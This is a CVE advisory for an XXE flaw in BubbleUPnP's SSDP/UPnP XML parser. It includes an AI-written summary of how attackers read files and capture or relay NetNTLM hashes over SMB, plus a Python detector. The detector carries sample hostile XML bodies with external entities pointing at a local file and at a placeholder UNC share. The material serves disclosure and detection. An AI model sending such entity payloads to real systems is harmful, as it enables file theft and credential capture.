CVE-2018-15506
Description
In BubbleUPnP 0.9 update 30, the XML parsing engine for SSDP/UPnP functionality is vulnerable to an XML External Entity Processing (XXE) attack. Remote, unauthenticated attackers can use this vulnerability to: (1) Access arbitrary files from the filesystem with the same permission as the user account running BubbleUPnP, (2) Initiate SMB connections to capture a NetNTLM challenge/response and crack the cleartext password, or (3) Initiate SMB connections to relay a NetNTLM challenge/response and achieve Remote Command Execution in Windows domains.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
BubbleUPnP 0.9 update 30 is vulnerable to XXE via its SSDP/UPnP XML parser, allowing remote unauthenticated attackers to read files, capture NetNTLM hashes, or achieve RCE on Windows domains.
Vulnerability
BubbleUPnP version 0.9 update 30 contains an XML External Entity (XXE) vulnerability in the XML parsing engine used for SSDP/UPnP functionality. The parser fails to disable external entity processing, allowing remote attackers to supply malicious XML payloads. This affects the BubbleUPnP server component, which processes UPnP discovery and control messages. The exact vulnerable versions are 0.9 update 30 and possibly earlier releases; later updates (e.g., 0.9 update 50 [1]) include general fixes but do not explicitly mention an XXE patch.
Exploitation
An attacker can exploit this vulnerability by sending a specially crafted SSDP or UPnP XML request to the BubbleUPnP server on the local network. No authentication or prior access is required. The attacker crafts an XML payload that references external entities, pointing to local files or an SMB share. The server's parser then processes the entity, potentially exfiltrating data via out-of-band channels (e.g., HTTP or SMB) or performing Server-Side Request Forgery (SSRF) to internal SMB servers.
Impact
Successful exploitation allows the attacker to:
1. Read arbitrary files from the server's filesystem with the permissions of the BubbleUPnP user account, leading to sensitive information disclosure (e.g., configuration files, passwords, or tokens).
2. Initiate SMB connections to a remote attacker-controlled server, capturing a NetNTLM challenge/response hash. This hash can be used offline to crack the user's cleartext password or relayed to gain Remote Command Execution (RCE) on Windows domain networks.
3. Further leverage the SMB relay for lateral movement or privilege escalation within a Windows domain environment.
Mitigation
As of the latest available changelog [1], BubbleUPnP Server version 0.9 update 50 (released January 2, 2025) does not explicitly list a fix for this XXE vulnerability. Users should review the changelog for any security-related changes and consider upgrading to the latest version. If no official patch is confirmed, workarounds include restricting network access to the BubbleUPnP server (e.g., firewall rules) or disabling UPnP/SSDP functionality if not required. The CVE is not listed on CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date.
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
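A detection-side check for the request shape described under Exploitation, added here as an example (it is not BubbleUPnP code and not part of the CVE record): it flags UPnP/SSDP XML bodies that carry a DTD or external entity declarations. It assumes legitimate UPnP description and SOAP control XML never includes a DOCTYPE; the function names and the sample bodies are constructed for illustration.

```python
import codecs
import re

DOCTYPE_RE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
# General or parameter entity with a SYSTEM/PUBLIC identifier: (name, target).
ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?:%\s*)?([\w.:-]+)\s+(?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))\s+["']([^"']*)["']""",
    re.IGNORECASE)

def _to_text(body: bytes) -> str:
    # A UTF-16 body would slip past a byte-level ASCII match, so decode first.
    if body[:2] in (codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE):
        return body.decode("utf-16", errors="replace")
    return body.decode("utf-8", errors="replace")

def classify(target: str) -> str:
    """Map an entity target to the impact class listed in the CVE description."""
    t = target.strip().lower()
    if t.startswith(("\\\\", "smb:")):
        return "smb"            # outbound SMB, NetNTLM exposure
    if t.startswith("file:"):
        return "local-file"     # filesystem read
    if t.startswith(("http:", "https:", "ftp:")):
        return "remote-fetch"   # out-of-band channel
    return "other"

def inspect_upnp_xml(body: bytes) -> list:
    """Return (kind, entity_name, target) findings; an empty list means clean."""
    text = _to_text(body)
    findings = []
    if DOCTYPE_RE.search(text):
        findings.append(("doctype", "", ""))
    for m in ENTITY_RE.finditer(text):
        findings.append((classify(m.group(2)), m.group(1), m.group(2)))
    return findings

# Constructed sample bodies (not captured traffic); paths and hosts are placeholders.
CLEAN = (b'<?xml version="1.0"?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
         b'<s:Body><u:Browse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1"/>'
         b'</s:Body></s:Envelope>')
FILE_REF = (b'<?xml version="1.0"?><!DOCTYPE root [<!ENTITY e SYSTEM "file:///PLACEHOLDER/path">]>'
            b'<root xmlns="urn:schemas-upnp-org:device-1-0">&e;</root>')
UNC_REF = (r'<!DOCTYPE root [<!ENTITY e SYSTEM "\\collector.example\share">]>'
           r'<root>&e;</root>').encode("utf-16")

if __name__ == "__main__":
    for label, body in (("clean", CLEAN), ("file", FILE_REF), ("unc", UNC_REF)):
        print(label, inspect_upnp_xml(body))
```

A filter like this only surfaces suspicious requests for alerting or dropping at a proxy; it does not replace disabling DTD and external entity processing in the parser itself.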
Affected products (2)
- BubbleUPnP/BubbleUPnP (description)
- Range: <= 0.9 update 30
Patches
No patches discovered yet.
References
[1] www.bubblesoftapps.com/bubbleupnpserver2/docs/changelog.html (mitre, x_refsource_CONFIRM)